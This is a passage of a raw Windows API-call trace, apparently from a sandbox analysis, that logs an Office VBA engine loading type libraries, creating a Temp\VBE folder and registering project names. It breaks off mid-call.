0x0 [0041.242] StringFromGUID2 (in: rguid=0x68f12f0*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x1873d0, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0041.242] _ultow_s (in: _Value=0x2, _Buffer=0x18731a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0041.242] _ultow_s (in: _Value=0x0, _Buffer=0x18731e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.242] _ultow_s (in: _Value=0x0, _Buffer=0x187322, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.242] wcscpy_s (in: _Destination=0x6c1ddb8, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0041.242] wcscpy_s (in: _Destination=0x6c1ddbe, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0041.242] wcscpy_s (in: _Destination=0x6c1de0a, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0041.242] wcscpy_s (in: _Destination=0x6c1de18, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0041.242] wcscpy_s (in: _Destination=0x6c1de58, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0041.242] ITypeLib:LocalReleaseTLibAttr (This=0x6992df0) returned 0x0 [0041.242] IMalloc:Realloc (This=0x7feffc15380, pv=0x6c80d20, cb=0x680) returned 0x6c8b5e0 [0041.242] wcscpy_s (in: _Destination=0x6c8b878, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0041.243] ITypeLib:RemoteGetDocumentation (in: This=0x6992df0, index=-1, refPtrFlags=0x1874c8, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x1) returned 0x0 [0041.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0041.243] strcpy_s (in: _Dst=0x1872c0, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0041.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1872c0, cbMultiByte=7, lpWideCharStr=0x187110, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0041.243] IUnknown:AddRef (This=0x6990960) returned 0x4 [0041.243] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="stdole", lHashVal=0x106093, pfName=0x1871e0, pBstrLibName=0x187110 | out: pfName=0x1871e0*=0, pBstrLibName=0x187110) returned 0x0 [0041.243] IUnknown:Release (This=0x6990960) returned 0x3 [0041.243] IUnknown:AddRef (This=0x6992850) returned 0x5 [0041.243] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="stdole", lHashVal=0x106093, pfName=0x1871e0, pBstrLibName=0x187110 | out: pfName=0x1871e0*=0, pBstrLibName=0x187110) returned 0x0 [0041.243] IUnknown:Release (This=0x6992850) returned 0x4 [0041.243] IMalloc:Alloc (This=0x7feffc15380, cb=0x24) returned 0x68f4110 [0041.243] IMalloc:Free (This=0x7feffc15380, pv=0x6b850e0) [0041.243] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68f3ff0 [0041.243] IMalloc:Realloc (This=0x7feffc15380, pv=0x68f3ff0, cb=0x50) returned 0x6a67500 [0041.243] IMalloc:Free (This=0x7feffc15380, pv=0x68f4110) [0041.243] wcsncpy_s (in: _Destination=0x1870c0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0041.243] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0041.243] IMalloc:Alloc (This=0x7feffc15380, cb=0xbe) returned 0x6c2bc40 [0041.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x6c2bc40, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0041.243] IMalloc:Free (This=0x7feffc15380, pv=0x6c2bc40) [0041.243] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\Z045de83298") returned -19 [0041.243] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation") returned 0 [0041.243] wcsncpy_s (in: _Destination=0x1870c0, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.243] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x186ff0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.243] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.243] IUnknown:AddRef (This=0x6992df0) returned 0x6 [0041.243] IUnknown:QueryInterface (in: This=0x6992df0, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1874e8 | out: ppvObject=0x1874e8*=0x0) returned 0x80004002 [0041.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x1874b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0041.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0041.244] IUnknown:Release (This=0x6992df0) returned 0x5 [0041.244] IUnknown:Release (This=0x6992df0) returned 0x4 [0041.244] GetModuleFileNameA (in: hModule=0x7fee4230000, lpFilename=0x187850, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0041.244] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", _SizeInBytes=0x104, _Source="\\3" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 0x0 [0041.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187850, cbMultiByte=-1, lpWideCharStr=0x1877b0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3") returned 69 [0041.244] LoadTypeLib (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL\\3", pptlib=0x187840*=0x0 | out: pptlib=0x187840*=0x6c92230) returned 0x0 [0041.248] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92230, GUID=0x7fee45d8ed0, ppTInfo=0x1879d0 | out: ppTInfo=0x1879d0*=0x6ca91d8) returned 0x0 [0041.249] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ca91d8, ppTypeAttr=0x187920, pDummy=0x0 | out: ppTypeAttr=0x187920, pDummy=0x0) returned 0x0 [0041.249] ITypeInfo:LocalReleaseTypeAttr (This=0x6ca91d8) returned 0x0 [0041.249] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ca91d8, ppTypeAttr=0x1878c0, pDummy=0x0 | out: ppTypeAttr=0x1878c0, pDummy=0x0) returned 0x0 [0041.249] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x187760 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0041.249] _access (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", _AccessMode=0) returned 0 [0041.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x187620, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0041.250] lstrlenA (lpString="VBE") returned 3 [0041.250] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0041.250] _msize (_Block=0x2747f10) returned 0x26 [0041.250] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0041.250] lstrlenA (lpString="VBE") returned 3 [0041.250] _msize (_Block=0x2747f40) returned 0x26 [0041.250] lstrlenA (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 37 [0041.250] lstrlenA (lpString="VBE") returned 3 [0041.250] lstrcatA (in: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", lpString2="VBE" | out: lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" [0041.250] strcpy_s (in: _Dst=0x274b7e0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0041.250] _access_s (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x2 [0041.251] strcpy_s (in: _Dst=0x274b7e0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0041.251] _mkdir (_Path="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0 [0041.251] strcpy_s (in: _Dst=0x274b7e0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0041.252] strcpy_s (in: _Dst=0x274b7e0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0041.252] strcpy_s (in: _Dst=0x274b7e0, _DstSize=0x29, _Src="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE" | out: _Dst="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 0x0 [0041.252] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x274b7e0, cbMultiByte=-1, lpWideCharStr=0x1875c0, cchWideChar=41 | out: lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE") returned 41 [0041.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", cchWideChar=-1, lpMultiByteStr=0x187860, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", lpUsedDefaultChar=0x0) returned 41 [0041.252] _access_s (_FileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\VBE", _AccessMode=0) returned 0x0 [0041.252] IUnknown:AddRef (This=0x6ca91d8) returned 0x2 [0041.252] ITypeInfo:LocalReleaseTypeAttr (This=0x6ca91d8) returned 0x0 [0041.252] StringFromCLSID (in: rclsid=0x274b79c*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a)), lplpsz=0x187890 | out: lplpsz=0x187890*="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 0x0 [0041.252] IMalloc:Alloc (This=0x7feffc15380, cb=0x27) returned 0x68f3ff0 [0041.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", cchWideChar=-1, lpMultiByteStr=0x68f3ff0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{3832D640-CF90-11CF-8E43-00A0C911005A}", lpUsedDefaultChar=0x0) returned 39 [0041.252] IMalloc:Free (This=0x7feffc15380, pv=0x6a67560) [0041.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x1878a0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0041.252] lstrlenA (lpString="VBE") returned 3 [0041.252] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 38 [0041.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE", cchWideChar=-1, lpMultiByteStr=0x187890, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE", lpUsedDefaultChar=0x0) returned 4 [0041.252] wsprintfA (in: param_1=0x274b7e0, param_2="%s;%s;&H%08lX" | out: param_1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0041.252] wsprintfA (in: param_1=0x1878b8, param_2="&H%08lX" | out: param_1="&H00000001") returned 10 [0041.252] lstrcpynA (in: lpString1=0x274b850, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0041.253] lstrcpyA (in: lpString1=0x2748ae0, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0041.253] IMalloc:Free (This=0x7feffc15380, pv=0x68f3ff0) [0041.253] GetCurrentThreadId () returned 0x8c0 [0041.253] GetCurrentThreadId () returned 0x8c0 [0041.253] IMalloc:Alloc (This=0x7feffc15380, cb=0x28) returned 0x68f3ff0 [0041.253] GetCursorPos (in: lpPoint=0x187ae0 | out: lpPoint=0x187ae0*(x=1018, y=358)) returned 1 [0041.253] GetCapture () returned 0x0 [0041.253] WindowFromPoint (Point=0x165000003f8) returned 0x50024 [0041.253] GetWindowThreadProcessId (in: hWnd=0x50024, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8c0 [0041.253] SendMessageA (hWnd=0x50024, Msg=0x84, wParam=0x0, lParam=0x16503f8) returned 0x1 [0041.253] SendMessageA (hWnd=0x50024, Msg=0x20, wParam=0x50024, lParam=0x2000001) returned 0x0 [0041.253] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0041.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0041.254] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0041.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=9, lpWideCharStr=0x68f0158, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0041.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x187ac0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.254] IsCharAlphaA (ch=78) returned 1 [0041.254] lstrlenA (lpString="Normal") returned 6 [0041.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187ae0, cbMultiByte=-1, lpWideCharStr=0x27493b0, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x187970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.254] lstrlenA (lpString="Normal") returned 6 [0041.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187ae0, cbMultiByte=-1, lpWideCharStr=0x27493b0, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x187930, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.254] lstrlenA (lpString="Normal") returned 6 [0041.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x187920, cbMultiByte=-1, lpWideCharStr=0x1878a0, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x1877e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x1877f0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.254] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.254] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0041.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0041.255] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0041.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=9, lpWideCharStr=0x68f0158, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x1878d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0041.255] lstrcmpA (lpString1="Project1", lpString2="Normal") returned 1 [0041.255] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x1877d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.255] lstrcmpiA (lpString1="Project1", lpString2="Normal") returned 1 [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x1876d0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.255] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5a62a3e, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0041.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5a62a3e, cbMultiByte=8, lpWideCharStr=0x68f12f8, cchWideChar=8 | out: lpWideCharStr="Project1") returned 8 [0041.255] GetLocalTime (in: lpSystemTime=0x187570 | out: lpSystemTime=0x187570*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x2e9)) [0041.255] wcsncpy_s (in: _Destination=0x187220, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.255] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x187150, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.255] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.255] GetLocalTime (in: lpSystemTime=0x187570 | out: lpSystemTime=0x187570*(wYear=0x7e2, wMonth=0xc, wDayOfWeek=0x4, wDay=0x6, wHour=0x16, wMinute=0x1a, wSecond=0x20, wMilliseconds=0x2e9)) [0041.255] wcsncpy_s (in: _Destination=0x187220, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.255] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x187150, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.255] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x1875e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.255] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x1875e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x1874a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.255] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.255] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.255] IMalloc:Alloc (This=0x7feffc15380, cb=0x30) returned 0x6889530 [0041.255] IMalloc:Free (This=0x7feffc15380, pv=0x6a67500) [0041.256] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68e9700 [0041.256] IMalloc:Realloc (This=0x7feffc15380, pv=0x68e9700, cb=0x50) returned 0x6a67500 [0041.256] IMalloc:Free (This=0x7feffc15380, pv=0x6889530) [0041.256] wcsncpy_s (in: _Destination=0x1872a0, _SizeInWords=0x108, _Source="*\\Z045de83298", _MaxCount=0x106 | out: _Destination="*\\Z045de83298") returned 0x0 [0041.256] CharLowerBuffW (in: lpsz="*\\Z045de83298", cchLength=0xd | out: lpsz="*\\z045de83298") returned 0xd [0041.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045de83298", cchWideChar=14, lpMultiByteStr=0x1871d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045de83298", lpUsedDefaultChar=0x0) returned 14 [0041.256] _wcsicmp (_String1="*\\Z045de83298", _String2="*\\Z045de83298") returned 0 [0041.256] strcpy_s (in: _Dst=0x6a7e250, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0041.256] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.256] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=7, lpWideCharStr=0x68e9708, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.256] lstrlenA (lpString="Normal") returned 6 [0041.256] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0041.256] SysStringByteLen (bstr="潎浲污") returned 0x6 [0041.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x68f12f8, cbMultiByte=7, lpWideCharStr=0x68e9708, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.257] lstrlenA (lpString="Normal") returned 6 [0041.257] lstrcmpiW (lpString1="Normal", lpString2="") returned 1 [0041.258] wcscpy_s (in: _Destination=0x187746, _SizeInWords=0x105, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0041.258] _wcsicmp (_String1="*\\CNormal", _String2="*\\Z045de83298") returned -23 [0041.258] IUnknown:AddRef (This=0x6990960) returned 0x4 [0041.258] IUnknown:QueryInterface (in: This=0x6990960, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1871a8 | out: ppvObject=0x1871a8*=0x0) returned 0x80004002 [0041.258] IUnknown:Release (This=0x6990960) returned 0x3 [0041.258] IUnknown:AddRef (This=0x6992850) returned 0x5 [0041.258] IUnknown:QueryInterface (in: This=0x6992850, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1871a8 | out: 